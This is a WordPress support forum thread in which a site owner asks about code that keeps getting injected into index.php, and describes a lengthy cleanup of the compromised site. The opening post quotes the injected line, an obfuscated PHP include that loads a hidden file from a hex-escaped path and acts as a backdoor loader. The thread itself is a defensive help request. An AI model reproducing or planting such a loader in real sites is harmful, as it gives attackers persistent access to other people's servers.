Is this malware?

  • Resolved seh93

    (@seh93)


    1 year, 2 months ago

    Hi there,

    I have an issue on one of my websites, recently the following code keeps getting injected into my index.php

    /a617b/

    $r7yw = “/usr/www/users/karb\x6dd\x6d/\x6dailers/2016/invite/.253e6298.ccss”; strpos($r7yw, ‘dw’); @include_once /* edzp */ ($r7yw);

    /a617b/

    As you can see it references a .ccss file, for the past 4 days I have been deleting these files but everyday they keep popping up, I have replaced WordPress core files each time but the next morning its back.

    Does someone know why this is happening and how to deal with it.

Viewing 6 replies - 1 through 6 (of 6 total)

  • Hello,

    Can you check if there are any malicious files present under your account and you have missed cleaning them? Also, you can check if there is any cronjob running that keeps injecting the malicious code and check for any malicious processes as well.

    Moderator t-p

    (@t-p)

    Carefully follow this guide.

    When you’re done, you may want to implement some (if not all) of the recommended security measures and start backing up your site.

    Thread Starter seh93

    (@seh93)

    I have checked the cronjobs and nothing seems suspicious.

    I have already done the following.

    1. Changed FTP passwords
    2. Changed database passwords.
    3. Scanned with Sucuri
    4. Scanned with Malcure Scan
    5. Removed any suspicious files that the scans picked up
    6. Deleted and replaced the wp-includes folder
    7. Added fire walls
    8. Generated new secret keys

    My site is already backed up so I could take a deeper look at the files. I will also go through the link provided to see if i missed anything. Thank you for the current feedback

    Moderator t-p

    (@t-p)

    Also check for “backdoors”. Useful links:
    https://ottopress.com/2009/hacked-wordpress-backdoors/
    https://www.wpbeginner.com/wp-tutorials/how-to-find-a-backdoor-in-a-hacked-wordpress-site-and-fix-it/

    Thread Starter seh93

    (@seh93)

    After spending 11 hours yesterday I managed to come right.

    Thank you t-p for all the help.

    I did the following:

    1. Located the files that it referenced in the index.php and removed them.
    2. Removed the wp-admin’s and wp-include’s folder. Replaced these folders with the ones from a WordPress download of the same version.
    3. Replaced all the files in the parent folder except the wp-config file.
    4. Went through the wp-config file and removed malicious code.
    5. Manually went through the wp-content’s folder which has a total of 22506 folders in it that I had to go through. My eyes were not happy about this one :). However I found more code that wasn’t meant to be there and they were strings in reverse. They did reference a wpsdth4_license_key in the options table in the database.
    6. I went through the database to remove the wpsdth4_license key from the database and went through the complete wp_post’s and wp_options table to remove anything that was suspicious.
    7. There was also hidden files containing malicious code in the servers home tmp folder this is before the public_html folder
    8. Deleted all WordPress cache manually.
    9. Changed the Database password and did the same changes in the wp-config file.
    10. Changed the ftp passwords
    11. Changed the user passwords.
    12. Changed all the Authentication unique keys and salts
    13. Then I made sure no suspicious cronjobs

    This was an extremely tedious and took a lot of strain on the eyes as it took a total of 11 hours to complete due to the amount of data I had to go through. However all seems to be secure and sorted now.

    Thanks again

    Moderator t-p

    (@t-p)

    Glad its sorted ??

Viewing 6 replies - 1 through 6 (of 6 total)
  • The topic ‘Is this malware?’ is closed to new replies.

Tags